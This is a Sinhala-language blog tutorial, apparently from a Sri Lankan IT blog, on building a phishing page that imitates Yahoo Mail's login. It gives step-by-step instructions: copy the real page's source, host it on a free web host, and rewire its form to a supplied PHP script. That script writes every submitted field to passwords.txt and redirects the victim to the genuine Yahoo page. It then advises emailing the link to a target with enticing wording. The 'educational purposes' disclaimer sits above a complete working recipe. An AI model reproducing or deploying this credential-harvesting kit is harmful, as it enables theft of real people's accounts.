Pishing Attack - Create Fake Login Page

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

අද වෙනකොට අන්තර්ජාලයේ සැරිසරන එක මහා භයානක දෙයක් බවට පත් වෙලා. මොකද හැමතැනම අපේ මුරපද හොරාගන්න, අපේ ඊමේල් ගිණුම් හැක් කරගන්න, අපේ අන්තර්ජාල ගෙවීම් වගේ දේවල් වල විස්තර ගන්න, පරිගණක ජාලයේ තදබදය වැඩි කරන්න බලාගෙන ඉන්න හැකර්ලා හැමතැනම. ඉතින් මං හැකින් ගැන හුගක් විස්තර කියලා තියනවා වගේම ඔයාලා හැක් කරන්න ගිහින් හැක් වෙන හැටිත් කියලා තියනවා.  මේ පෝස්ට් එකෙන් මං ලියන්න යන්නේ කොහොමද අපිව හැක් කර ගන්න හැකර් කෙනෙක් භාවිතයේ පවතින ජනප්‍රිය වෙබ් අඩවි භාවිතා කරන්නේ කියලා. ඉතින් සරලවම කියනවා නම් ෆිෂින් ප්‍රහාරයක් එල්ල කරන්නේ කොහොමද කියන එක. 

ඉතින් මේක කියවන ඔයාල කියවල මේක ප්‍රයෝගිකව කරන්නත් උත්සහා කරනවා නම් වෙන කෙනෙක් හැක් කරන්න බාවිතා කරන්න එපා. මට කියන්න ඕනේ කම තියෙන්නේ මේ වගේ වෙබ් අඩවි අටවගෙන ඕනේ තරම් කට්ටිය අන්තර්ජාලයේ ඉන්න බවත් ඒවාට අහු වෙන්න එපා කියන එකත්.

හැකර් කෙනෙක්ට මේ දේ කරන්න ඕනේ කරන දේවල් කීපයක් තියනවා.

1. වෙබ් අඩවියක් හෝස්ට් කරන්න පුලුවන් ගිණුමක් 

ඉතින් අදවෙනකොට නොමිලේ වෙබ් අඩවි දියත් කරන්න එහෙම නැත්නම් හෝස්ට් කරන්න දෙන වෙබ් අඩවි ඕනේ තරම් හොයාගන්න පුලුවන්. ඉතින් ඒ වගේ වෙබ් අඩවියක් හොයාගෙන ඒකේ ලියපදිංචි වෙන්න. කිසිම විටක ලියපදිංචියේදී භාවිතයේ පවතින ජනප්‍රිය නාමයන් වෙබ් අඩවි ලිපිනය විදියට බාවිතා කරන්න එපා. යාහූ ගූගල් වගේ දේවල් බාවිතා කරන්න එප. ඉතින් මේ උදාහරණයට ඕනේ ගිණුම හදන්නේ www.000webhost.com කියන web අඩවියෙ. ඔයාලටත් මේකෙන් නොමිලේ හොස්ටින් ගිණුමක් හදාගන්න පුලුවන්. 

2. බොරු login page එකක්

යම් ගිණුඅමකට ලොග් වෙන්න නම් login page එකක් තියෙන්නෙ ඕනේ. ඔයාලා දන්නවා යාහු මේල් වලට, පේස්බුක් වලට මෙ හැම එකකටම login page එකක් තියනවා. ඉතින් මේ Fishing Attack එකකටත් බොරු login page එකක් හදාගන්න වෙනවා ඒකට අපිට පුලුවන් පහල ක්‍රමය අනුගමනය කරන්න. 

භාවිතා වෙන login page එකකට යන්න. මං උදාහරණයට ගන්නේ යාහූ මේල් වල login page එක

ඊලගට ඒ login page එක උඩ Right Click කරලා view source යන්න. එතනදී මේ පේජ් එකට අදාල සෝස් කෝඩ් එක පෙන්නනවා. 

ඊලගට මේ සම්පූර්ණ සෝස් කෝඩ් එක කොපි කරගෙන notepad එකක පේස්ට් කරගන්න. ඒ ගොනුව .html ගොනුවක් ලෙසින් සුරක්ශිත කරන්න. මගේ උදාහරණයේදී මං භාවිතා කරන්නේ yahoo.html ලෙසයි 

3. php කේත ගොනුවක්

පහල දැක්වෙන කේත් සටහන් ටික කොපි කරගෙන notepad එකක පේස්ට් කරගන්න. ඒ ගොනුව code.php ලෙසින් සුරක්ශිත කරන්න. 

<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

4. හිස් ටෙස්ට් ෆයිල් ගොනුවක් 

මොනවත් නැති හිස් ටෙස්ට් ෆයිල් ගොනුවක් සාදා එය password.txt ලෙස සුරක්ශිත කරන්න.

 ඉතින් මේ වෙනකොට ගොනු 3ක් ඔයාලා ගාව තියනවා.  yahoo.html , password.txt සහ code.php ඉතින් අපි බලමු මේවාගේ කේත කොටස් වෙනස් කරගන්න විදිය සහ මේ ගොනු 3 ම් එකිනෙක සම්බන්ද කරන ආකාරය. මුලින්ම yahoo.html එක නෝට්පෑඩ් එකෙන් ඕපන් කරගන්න. 

ඊලගට ctrl+F සෙවුමක් පටන් ගන්න. එතනදී අපි හොයන්නේ action කියන කොටස. පහල රූපයේ මෙන් අපිට ඒක හොයාගන්න් පුලුවන්. මේ වගෙම නොවුනත් මීට සමානව අපිට මෙ කේතය බලාගන්න පුලුවන්. 

ඊලගට මේ රතුපාටින් දක්වල තියන කොටස වෙනුවට පහල් රූපයේ තියන රතු පාටින් තියන කොටස යොදන්න.

හරි, ඊලගට මේ ගොනුව සේවු කරන්න. ඉන්පසු code.php ගොනුව ඕපන් කරගන්න. එතන ඇති original login page කියන එක වෙනුවට https://login.yahoo.com/config/login_verify2?&.src=ym  කියන එක එහෙම නැත්නම් ඉහල රූපයේ රතු පාටින් දක්වල තියන https: ලෙසින් පටන් ගන්න කොටස යොදන්න.

  

 හරි, කේත කොටස් වෙනක් කිරීම් කරල ඉවර උනාට පස්සේ අපිට පුලුවන් මේ ගොනු 3 ම අපි මුලින්ම හදාගත්ත වෙබ් හෝස්ටින් ගිණුමට එකතු කරන්න. 

හදාගත්ත ගිණුමට ලොග් වෙලා එහි file manager වලට යන්න. පහල රූපයේ මෙන් පෙන්නයි. 

ඊලගට අලුත් ඩිරෙක්ටරියක් හදන්න. මං හදන්නේ abc කියලා  

ඊලගට අපි හදාගත් ගොනු 3 ම Upload කරන්න.

ඊලගට අපිට පෙන්නන කොටසේ ඇති .html සහ .txt වලට අදාල ලින්කු කොපි කරගන්න. .html ලින්කුවෙන් තමයි අපි කේතයන් වෙනස් කර සෑදූ බොරු Login Page එකට යන්නේ. ඉතින් මේ ලින්කුව ඔයාලට පුලුවන් හැක් කරන්න එහෙම නැත්නම් Fishing Attack එකක් දෙන්න් ඕනේ කෙනාගේ ඊමේල් ගිණුමට යවන්න ආකර්ශණීය වචන ටිකකුත් එක්ක. ඉතින් ඔයාලට පේනවා නේද වෙන දේ? අපි යවන ලින්කුව ඒක බලන කෙනා ක්ලික් කලාම ඕපන් වෙන්නේ  අපි හදපු වෙබ් පිටුව. ඒකෙදි ඔහු විසින් ලබාදෙන මුරපද සියල්ල අපි හදපු password.txt  ගොනුව තුල සුරක්ශිත වෙනවා. ඉතින් බලන්න ඔයාලා කොයිතරම් බරපතල අවදානමකද ඉන්නෙ කියලා? ඒ හින්දා නොදන්න ලින්කු වල ක්ලික් කරලා හැක් වෙන්න එපා.

පහල උදාහරණ වලින් බලන්න. මෙවුවා තමයි Fishing Attack විදියට එන්නේ. 

About the author
Eranda Dayawansa

Eranda Dayawansa is a Microsoft Certified ICT Instructor and Blogger from 2008 who loves all Things of Information Technology. He is also the chief editor at his blog – HelpITLanka which shares new exciting and informative discoveries found from surfing the net.